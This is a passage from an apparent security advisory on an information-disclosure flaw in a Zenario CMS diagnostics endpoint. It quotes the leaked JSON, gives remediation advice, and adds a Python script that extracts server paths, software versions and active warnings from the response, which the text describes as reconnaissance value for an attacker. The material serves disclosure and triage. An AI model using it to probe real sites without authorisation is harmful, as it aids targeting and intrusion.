configuration"},"hide_on_install":"1","visible_if":"zenarioAW.togglePressed(1)","ord":86,"row_class":"section_warning"},"show_site":{"grouping":"sub_table","type":"toggle","redraw_onchange":"1","same_row":"1","hide_on_install":"1","visible_if":"zenarioAW.togglePressed(1, tuixObject)","ord":87,"pressed":true},"site_description_missing":{"grouping":"sub_table","full_width":"1","row_class":"sub_level","snippet":{"html":"This site's description file is missing.\nPlease create the zenario_custom\/site_description.yaml<\/code> file,\ne.g. 
by copying or symlinking one of the files from the\nzenario\/api\/sample_site_descriptions\/<\/code> directory."},"hide_on_install":"1","visible_if":"zenarioAW.togglePressed()","ord":88,"hidden":true},"site_disabled":{"grouping":"sub_table","full_width":"1","row_class":"valid","snippet":{"html":"Your site is enabled."},"hide_on_install":"1","visible_if":"zenarioAW.togglePressed()","ord":89},"site_special_pages_unpublished":{"grouping":"sub_table","full_width":"1","row_class":"valid","snippet":{"html":""},"hide_on_install":"1","visible_if":"zenarioAW.togglePressed()","ord":90,"hidden":true},"public_documents":{"grouping":"sub_table","full_width":"1","row_class":"valid","snippet":{"html":""},"hide_on_install":"1","visible_if":"zenarioAW.togglePressed()","ord":91,"hidden":true},"site_automated_backups":{"grouping":"sub_table","full_width":"1","row_class":"valid","snippet":{"html":"Automated backups are running."},"hide_on_install":"1","visible_if":"zenarioAW.togglePressed()","ord":92},"scheduled_task_manager":{"grouping":"sub_table","full_width":"1","row_class":"valid","snippet":{"html":""},"hide_on_install":"1","visible_if":"zenarioAW.togglePressed()","ord":93,"hidden":true},"spare_domains_without_primary_domain":{"grouping":"sub_table","full_width":"1","row_class":"sub_level","snippet":{"html":"Domain name redirects have been created for this site, but they will not function because no primary domain is defined.\nPlease go to\n\n Domains<\/em> in the site settings\n<\/a>\nto define a primary domain."},"hide_on_install":"1","visible_if":"zenarioAW.togglePressed()","ord":94,"hidden":true},"forwarded_ip_misconfigured":{"grouping":"sub_table","full_width":"1","row_class":"sub_level","snippet":{"html":"The USE_FORWARDED_IP<\/code> constant is enabled\nin your zenario_siteconfig.php<\/code> file,\nbut you are not using a load balancer or a proxy,\nor your load balancer or proxy is 
misconfigured."},"visible_if":"zenarioAW.togglePressed()","ord":95,"hidden":true},"errors_not_shown":{"grouping":"sub_table","full_width":"1","row_class":"warning","snippet":{"html":"Your site is in development mode,\nbut if you're developing modules you would not be able to see PHP errors and notices.\n(The ERROR_REPORTING_LEVEL<\/code>\nshould be set to (E_ALL | E_NOTICE | E_STRICT)<\/code>\nin your zenario_siteconfig.php<\/code> file - or\nclick the hammer icon at the bottom left of Organizer\nto fully enable the site.)"},"hide_on_install":"1","visible_if":"zenarioAW.togglePressed()","ord":96,"hidden":false},"notices_shown":{"grouping":"sub_table","full_width":"1","row_class":"sub_level","snippet":{"html":"Your site is in production mode, but you are showing PHP notices.\n\n(The ERROR_REPORTING_LEVEL<\/code>\nshould be set to (E_ALL & ~E_NOTICE & ~E_STRICT)<\/code>\nin your zenario_siteconfig.php<\/code> file.)"},"hide_on_install":"1","visible_if":"zenarioAW.togglePressed()","ord":97,"hidden":true},"email_addresses_overridden":{"grouping":"sub_table","full_width":"1","row_class":"sub_level","snippet":{"html":""},"hide_on_install":"1","visible_if":"zenarioAW.togglePressed()","ord":98,"hidden":true},"missing_modules":{"grouping":"sub_table","full_width":"1","row_class":"sub_level","snippet":{"html":""},"hide_on_install":"1","visible_if":"zenarioAW.togglePressed()","ord":99,"hidden":true},"bad_extra_module_symlinks":{"grouping":"sub_table","full_width":"1","row_class":"sub_level","snippet":{"html":""},"hide_on_install":"1","visible_if":"zenarioAW.togglePressed()","ord":100,"hidden":true},"module_errors":{"grouping":"sub_table","full_width":"1","row_class":"sub_level","snippet":{"html":""},"hide_on_install":"1","visible_if":"zenarioAW.togglePressed()","ord":101,"hidden":true},"no_ssl_for_login":{"grouping":"sub_table","full_width":"1","row_class":"warning","snippet":{"html":"This site has a login for extranet users,\nbut doesn't use HTTPS to secure the transmission 
of passwords and other personal data.\nWe recommend you ask your system administrator to make this site run using HTTPS."},"hide_on_install":"1","visible_if":"zenarioAW.togglePressed()","ord":102,"hidden":false},"two_factor_security":{"grouping":"sub_table","full_width":"1","row_class":"warning","snippet":{"html":"This site contains user-related data,\nbut you are not protecting your admin-login with two-factor authentication.\nPlease edit the zenario_custom\/site_description.yaml<\/code> file\nto enable two-factor authentication."},"hide_on_install":"1","visible_if":"zenarioAW.togglePressed()","ord":103,"hidden":false},"robots_txt":{"grouping":"sub_table","full_width":"1","row_class":"sub_level","snippet":{"html":""},"hide_on_install":"1","visible_if":"zenarioAW.togglePressed()","ord":104,"hidden":true},"content":{"grouping":"sub_table","full_width":"1","snippet":{"html":"Site content"},"hide_on_install":"1","visible_if":"zenarioAW.togglePressed(1)","ord":105,"row_class":"section_warning"},"show_content":{"grouping":"sub_table","type":"toggle","redraw_onchange":"1","same_row":"1","hide_on_install":"1","visible_if":"zenarioAW.togglePressed(1, tuixObject)","ord":106,"pressed":true},"content_nothing_unpublished":{"grouping":"sub_table","full_width":"1","row_class":"valid","snippet":{"html":"You have no unpublished content items."},"hide_on_install":"1","visible_if":"zenarioAW.togglePressed()","ord":107,"hidden":true},"content_unpublished_1":{"grouping":"sub_table","full_width":"1","row_class":"warning","snippet":{"html":"<\/span>html_44\/news-list<\/a> is in draft mode."},"hide_on_install":"1","visible_if":"zenarioAW.togglePressed()","ord":108,"hidden":false},"content_unpublished_2":{"grouping":"sub_table","full_width":"1","row_class":"warning","snippet":{"html":"<\/span>html_43\/gallery<\/a> is in draft 
mode."},"hide_on_install":"1","visible_if":"zenarioAW.togglePressed()","ord":109,"hidden":false},"content_unpublished_3":{"grouping":"sub_table","full_width":"1","row_class":"warning","snippet":{"html":"<\/span>news_5\/news-1<\/a> is in draft mode."},"hide_on_install":"1","visible_if":"zenarioAW.togglePressed()","ord":110,"hidden":false},"content_unpublished_4":{"grouping":"sub_table","full_width":"1","row_class":"warning","snippet":{"html":"<\/span>news_6\/news-2<\/a> is in draft mode."},"hide_on_install":"1","visible_if":"zenarioAW.togglePressed()","ord":111,"hidden":false},"content_unpublished_5":{"grouping":"sub_table","full_width":"1","row_class":"warning","snippet":{"html":"<\/span>html_41\/home-staging<\/a> is in draft mode."},"hide_on_install":"1","visible_if":"zenarioAW.togglePressed()","ord":112,"hidden":false},"content_more_unpublished":{"grouping":"sub_table","full_width":"1","row_class":"warning","snippet":{"html":"3 other pages are in draft mode. View...<\/a>"},"hide_on_install":"1","visible_if":"zenarioAW.togglePressed()","ord":113,"hidden":false},"continue":{"value":"Continue","type":"submit","full_width":"1","style":"float: right;","ord":114},"check_again":{"value":"Check again","type":"submit","same_row":"1","style":"float: right;","ord":115,"hidden":false},"skin_dir_status_0":{"hidden":false},"skin_dir_0":{"hidden":false}},"ord":1,"errors":[]}],"path":"diagnostics","_task":false}

The impact of this vulnerability : Possible sensitive information disclosure.

How to fix this vulnerability : Remove this file from your website or change its permissions to remove access. Note that welcome.ajax.php is the back end of the admin login wizard (the request in the previous advisory submits its "login" and "forgot" tabs to it), so removing it or denying access to it disables administrator login. The practical fix is to confirm that the "diagnostics" path is only answered for an authenticated administrator, and to act on what the panel itself reports: the site is in development mode, the extranet login does not use HTTPS, and the admin login has no two-factor authentication.

# Want to follow my activity ?
https://www.linkedin.com/in/ismailtasdelen
https://github.com/ismailtasdelen
https://twitter.com/ismailtsdln
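Triage of the diagnostics response above, as an added example that is not part of the advisory and not Zenario code: it walks the TUIX-style JSON that welcome.ajax.php returns and collects the parts that are actually sensitive, namely text fields whose value is an absolute server path, the version strings embedded in the post_field_html of the requirement rows, and the warning rows the panel is showing (a row with "hidden":true is a check that passed). The input is a constructed subset of the JSON quoted above, with the demo site's values; the function names are this example's own.

```python
import json
import os
import re

# Constructed subset of the diagnostics JSON quoted above; values are the ones
# the demo site returned, reduced to the fields that matter for triage.
SAMPLE_DIAGNOSTICS = json.dumps({
    "key": {"first_viewing": False},
    "tab": "0",
    "tabs": [{
        "fields": {
            "server_1": {"snippet": {"html": "Apache http server version 2.4.7 or later"},
                         "post_field_html": " (you have version Server version: Apache/2.4.18 (Ubuntu) "
                                            "Server built: 2017-09-18T15:09:02</em>)"},
            "php_1": {"snippet": {"html": "PHP version 7.0 or later"},
                      "post_field_html": " (you have version 7.0.28-0ubuntu0.16.04.1</em>)"},
            "mysql_2": {"post_field_html": " (your client is version mysql Ver 14.14 Distrib 5.7.20, "
                                           "for Linux (x86_64) using EditLine wrapper</em>)"},
            "backup_dir": {"type": "text", "readonly": True, "value": "/var/www/clients/zenario_demo/backup"},
            "docstore_dir": {"type": "text", "readonly": True,
                             "value": "/var/www/clients/zenario_demo/docstore_staging"},
            "cache_dir": {"type": "text", "readonly": "readonly",
                          "value": "/var/www/clients/zenario_demo/public_html_live/cache"},
            "skin_dir_2": {"type": "text", "readonly": "readonly", "value": "", "hidden": True},
            "no_ssl_for_login": {"row_class": "warning", "hidden": False,
                                 "snippet": {"html": "This site has a login for extranet users, but doesn't use HTTPS"}},
            "two_factor_security": {"row_class": "warning", "hidden": False,
                                    "snippet": {"html": "you are not protecting your admin-login with two-factor authentication"}},
            "opcache_misconfigured": {"row_class": "sub_level", "hidden": True,
                                      "snippet": {"html": "opcache.dups_fix turned off"}},
            "continue": {"type": "submit", "value": "Continue"},
        }
    }],
    "path": "diagnostics",
})

ABS_PATH_RE = re.compile(r"^/\S+$")
VERSION_RE = re.compile(r"(?:you have version|your client is version)\s*(?P<v>.*?)(?:</em>|$)")


def tuix_fields(doc: dict) -> dict:
    """Flatten the fields of every tab (tabs may be a list or a dict) into one
    {name: field} mapping."""
    tabs = doc.get("tabs", [])
    tabs = tabs.values() if isinstance(tabs, dict) else tabs
    fields = {}
    for tab in tabs:
        fields.update(tab.get("fields", {}))
    return fields


def leaked_paths(doc: dict) -> dict:
    """Text fields whose value is an absolute server path."""
    return {name: f["value"] for name, f in tuix_fields(doc).items()
            if f.get("type") == "text" and isinstance(f.get("value"), str) and ABS_PATH_RE.match(f["value"])}


def leaked_versions(doc: dict) -> dict:
    """Software versions embedded in the requirement-check rows."""
    out = {}
    for name, f in tuix_fields(doc).items():
        m = VERSION_RE.search(f.get("post_field_html", ""))
        if m:
            out[name] = m["v"].strip()
    return out


def active_warnings(doc: dict) -> list:
    """Warning rows the panel is actually showing ("hidden": false); a hidden
    warning row is a check that passed."""
    return sorted(name for name, f in tuix_fields(doc).items()
                  if f.get("row_class") in ("warning", "sub_level", "section_warning") and f.get("hidden") is False)


def triage(raw_json: str) -> dict:
    """Summarise one diagnostics response: paths, their common root, versions, warnings."""
    doc = json.loads(raw_json)
    paths = leaked_paths(doc)
    return {
        "paths": paths,
        "common_root": os.path.commonpath(list(paths.values())) if paths else None,
        "versions": leaked_versions(doc),
        "warnings": active_warnings(doc),
    }


if __name__ == "__main__":
    print(json.dumps(triage(SAMPLE_DIAGNOSTICS), indent=2))
```

The common root of the leaked paths is the per-client directory of the hosting layout, and the version strings are precise enough to match against vulnerability databases; those two items, plus the active warnings, are what an attacker takes from this response, not a password.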